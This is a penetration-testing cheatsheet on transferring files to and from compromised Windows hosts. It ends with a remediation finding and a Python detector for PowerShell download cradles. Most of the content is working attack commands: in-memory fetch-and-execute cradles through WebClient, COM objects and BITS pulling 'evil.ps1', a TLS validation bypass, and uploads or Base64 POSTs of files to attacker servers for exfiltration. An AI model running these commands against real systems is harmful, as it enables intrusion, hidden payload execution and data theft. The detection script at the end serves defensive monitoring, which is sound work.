🛡️ Methodology Checklist
- PowerShell IWR: `IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/[FILE]')`
- PowerShell save to disk: `Invoke-WebRequest -Uri http://[LHOST]/[FILE] -OutFile C:\[FILE]`
- PowerShell upload: `IWR -Uri http://[LHOST]:8000/upload -Method POST -InFile [FILE]`
- Bypass download restriction: use `$env:APPDATA` or `$env:TEMP` as the drop path
- Verify execution policy: `Get-ExecutionPolicy`; bypass if needed
- Check whether Defender real-time protection blocks the download
🎯 Operational Context
Use when: Moving files to/from Windows target — match method to available capabilities: PowerShell, SMB, certutil, BITS, WebDAV.
Think Dumber First: PowerShell Invoke-WebRequest or (New-Object Net.WebClient).DownloadFile() — available on all Windows 7+ systems. If outbound blocked, SMB pull: host impacket-smbserver on attack box, access via \\[LHOST]\share\file.
Skip when: PowerShell execution policy blocks and no LOL alternatives available — use interactive RDP clipboard paste.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `(New-Object Net.WebClient).DownloadFile('http://[TARGET_IP]/file', 'C:\Users\Public\file')` | Download file to disk via WebClient |
| `(New-Object Net.WebClient).DownloadFileAsync('http://[TARGET_IP]/file', 'C:\Users\Public\file')` | Non-blocking async download |
| `IEX (New-Object Net.WebClient).DownloadString('http://[TARGET_IP]/script.ps1')` | Fileless download — execute in memory |
| `Invoke-WebRequest http://[TARGET_IP]/file -OutFile file` | Download using IWR (aliases: iwr, curl, wget) |
| `Invoke-WebRequest http://[TARGET_IP]/file -UseBasicParsing \| IEX` | Bypass IE first-launch error |
| `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}` | Disable SSL cert validation |
| `cat [FILENAME] \| base64 -w 0; echo` | Encode file to Base64 (Linux attacker) |
| `[IO.File]::WriteAllBytes("C:\Users\Public\[FILENAME]", [Convert]::FromBase64String("[BASE64]"))` | Decode Base64 to file (Windows target) |
| `Get-FileHash C:\Users\Public\[FILENAME] -Algorithm md5` | Verify integrity after transfer |
| `sudo impacket-smbserver share -smb2support /tmp/smbshare` | Anonymous SMB share on attacker |
| `sudo impacket-smbserver share -smb2support /tmp -user [USER] -password [PASS]` | Authenticated SMB share |
| `copy \\[TARGET_IP]\share\nc.exe` | Download from SMB share (anonymous) |
| `net use n: \\[TARGET_IP]\share /user:[USER] [PASS]` | Mount authenticated SMB share |
| `sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous` | Start WebDAV server (attacker) |
| `copy [FILE] \\[TARGET_IP]\DavWWWRoot\` | Upload to WebDAV share |
| `sudo python3 -m pyftpdlib --port 21` | Start FTP server on attacker |
| `(New-Object Net.WebClient).DownloadFile('ftp://[TARGET_IP]/file', 'C:\Users\Public\file')` | Download from FTP via PowerShell |
| `python3 -m uploadserver` | Start HTTP upload server (attacker) |
| `Invoke-FileUpload -Uri http://[TARGET_IP]:8000/upload -File C:\path\to\file` | Upload file to Python upload server |
| `$b64=[System.Convert]::ToBase64String((Get-Content -Path '[FILE]' -Encoding Byte)); Invoke-WebRequest -Uri http://[TARGET_IP]:8000/ -Method POST -Body $b64` | Base64 encode + POST to nc listener |
🔬 Deep Dive & Workflow
WebClient Method Comparison
| Method | Disk? | Use Case |
|---|---|---|
| DownloadFile | Yes | Drop tools to filesystem |
| DownloadString + IEX | No (RAM) | Fileless script execution |
| DownloadData | No | Load binaries into memory variables |
| DownloadFileAsync | Yes | Non-blocking; keeps shell responsive |
Advanced Download Cradles (When WebClient is Blocked)
```powershell
# IE COM — uses browser engine, bypasses simple filters
$ie=New-Object -comobject InternetExplorer.Application
$ie.visible=$False; $ie.navigate('http://[TARGET_IP]/evil.ps1')
start-sleep -s 5; $r=$ie.Document.body.innerHTML; $ie.quit(); IEX $r

# Msxml2 COM — classic dropper method
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://[TARGET_IP]/evil.ps1',$false); $h.send(); iex $h.responseText

# WinHttp COM — lightweight, not proxy-aware
$h=new-object -com WinHttp.WinHttpRequest.5.1
$h.open('GET','http://[TARGET_IP]/evil.ps1',$false); $h.send(); iex $h.responseText

# BITS — trusted Windows service, touches disk
Import-Module bitstransfer; Start-BitsTransfer 'http://[TARGET_IP]/evil.ps1' $env:temp\t
$r=gc $env:temp\t; rm $env:temp\t; iex $r
```

Protocol Priority Decision Tree
- HTTP available? → `python3 -m http.server` + `Invoke-WebRequest` — fastest setup
- SMB (445) open? → `impacket-smbserver` + `copy` / `net use` — good for large files
- HTTP blocked, SMB blocked? → WebDAV on port 80 (`wsgidav`) — bypasses SMB filtering
- All blocked? → Use coding-language cradles or `/dev/tcp` bash redirection
FTP Non-Interactive (CMD Scriptable)
```cmd
echo open [TARGET_IP] > ftp.txt
echo USER anonymous >> ftp.txt
echo binary >> ftp.txt
echo GET file.txt >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
```

WebDAV Note
`DavWWWRoot` is a special keyword that connects to the WebDAV root — not an actual folder on the server.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| PowerShell Invoke-WebRequest fails | TLS 1.2 not default on old Windows | Add: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 |
| SMB share access denied | SMB signing or credential required | Use: impacket-smbserver share . -smb2support -username [USER] -password [PASS] |
| WebClient service not running | WebDAV disabled | Start: net start webclient then access via \\[LHOST]@80\share\ |
| BITS transfer stays queued | BITS service needs restart | net stop bits && net start bits; verify BITS service not disabled |
| DownloadFile returns no file | Silent failure on error | Check: (New-Object Net.WebClient).DownloadString('http://[LHOST]/test.txt') to see error message |
📝 Reporting Trigger
Finding Title: Unrestricted File Transfer Capability on Windows Target

Impact: PowerShell and LOL binary transfer methods enable reliable payload delivery and data staging on Windows systems, supporting post-exploitation tool deployment and exfiltration operations.

Root Cause: PowerShell and built-in Windows transfer capabilities are unrestricted. No egress filtering on workstation or server outbound HTTP/SMB traffic.

Recommendation: Implement outbound proxy with URL filtering. Disable PowerShell v2. Restrict LOL binary network access via WDAC. Monitor for unusual PowerShell download cradle patterns.
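The recommendation closes with monitoring for download-cradle patterns. As an added example (not part of the original cheatsheet), the following Python scans PowerShell ScriptBlock logging text (Event ID 4104 `ScriptBlockText`) for the cradles catalogued on this page: WebClient downloads, Invoke-WebRequest and its aliases, the Msxml2/WinHttp/IE COM objects, BITS, the Base64-to-disk drop, and the certificate-validation bypass. Rule labels, severities, hostnames, usernames and the sample events are this example's own assumptions; the events are constructed, and the rules deliberately tolerate PowerShell's case-insensitivity and loose spacing so trivial case changes do not evade them.

```python
"""Scan PowerShell ScriptBlock log text (Event ID 4104 ScriptBlockText) for the
download-cradle patterns catalogued on this page. Added example; the events
below are constructed, and rule labels / severities are this example's own."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# (technique label, regex). PowerShell is case-insensitive and tolerant of
# whitespace, so every rule is compiled with re.IGNORECASE and allows \s*.
CRADLE_RULES = [
    ("webclient-download",
     re.compile(r"Net\.WebClient\b.*?\.Download(?:String|File|Data|FileAsync)\s*\(", re.I | re.S)),
    # Invoke-WebRequest and its PowerShell aliases (iwr, curl, wget) listed in the cheatsheet
    ("iwr-download", re.compile(r"\b(?:Invoke-WebRequest|iwr|curl|wget)\b", re.I)),
    ("com-msxml", re.compile(r"Msxml2\.(?:Server)?XMLHTTP", re.I)),
    ("com-winhttp", re.compile(r"WinHttp\.WinHttpRequest", re.I)),
    ("com-ie", re.compile(r"InternetExplorer\.Application", re.I)),
    ("bits-transfer", re.compile(r"\bStart-BitsTransfer\b", re.I)),
    # Base64 blob written straight to disk, in either argument order
    ("base64-drop",
     re.compile(r"FromBase64String\s*\(.*?WriteAllBytes|WriteAllBytes\s*\(.*?FromBase64String", re.I | re.S)),
    ("tls-validation-bypass",
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
]
# An execution sink turns a download into in-memory (fileless) execution.
EXEC_SINK = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)


@dataclass
class Finding:
    host: str
    user: str
    techniques: List[str]
    severity: str


def classify(script_text: str) -> Tuple[List[str], Optional[str]]:
    """Return (matched technique labels, severity) for one script block;
    ([], None) when nothing on the cradle list is present."""
    hits = [label for label, rx in CRADLE_RULES if rx.search(script_text)]
    if not hits:
        return [], None
    # A download feeding IEX / Invoke-Expression never touches disk: rate it higher.
    severity = "high" if EXEC_SINK.search(script_text) else "medium"
    return hits, severity


def scan(events) -> List[Finding]:
    """Run classify() over a list of {"host", "user", "script"} events."""
    findings = []
    for ev in events:
        hits, severity = classify(ev["script"])
        if hits:
            findings.append(Finding(ev["host"], ev["user"], hits, severity))
    return findings


def summarize(findings) -> dict:
    """Count findings per severity, e.g. {"high": 3, "medium": 3}."""
    counts = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


# Constructed sample events (not real log data); 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alice",
     "script": r"Get-ChildItem C:\Users\Public | Sort-Object Length"},  # benign
    {"host": "WS01", "user": "alice",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/script.ps1')"},
    {"host": "WS02", "user": "bob",
     "script": r"Invoke-WebRequest http://203.0.113.10/tool -OutFile C:\Users\Public\tool"},
    {"host": "WS02", "user": "bob",
     "script": "$h=new-object -com WinHttp.WinHttpRequest.5.1; $h.open('GET','http://203.0.113.10/a.ps1',$false); $h.send(); iex $h.responseText"},
    {"host": "SRV01", "user": "svc_app",
     "script": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"},
    {"host": "SRV01", "user": "svc_app",
     "script": r"[IO.File]::WriteAllBytes('C:\Users\Public\x.exe', [Convert]::FromBase64String('TVqQAA=='))"},
    # Mixed case and odd spacing: PowerShell accepts it, so the rules must too.
    {"host": "WS03", "user": "carol",
     "script": "iex ( NEW-OBJECT net.webclient ).downloadstring( 'http://203.0.113.10/s.ps1' )"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.severity:6} {f.host}/{f.user}: {', '.join(f.techniques)}")
    print(summarize(scan(SAMPLE_EVENTS)))
```

The benign `Get-ChildItem` event produces no finding; the three events that pipe a download into `iex` are rated high because nothing reaches disk for file-based controls to catch, while the `-OutFile`, Base64 drop and certificate-bypass events are rated medium. Feed real 4104 events in by mapping the `ScriptBlockText` field to the `script` key.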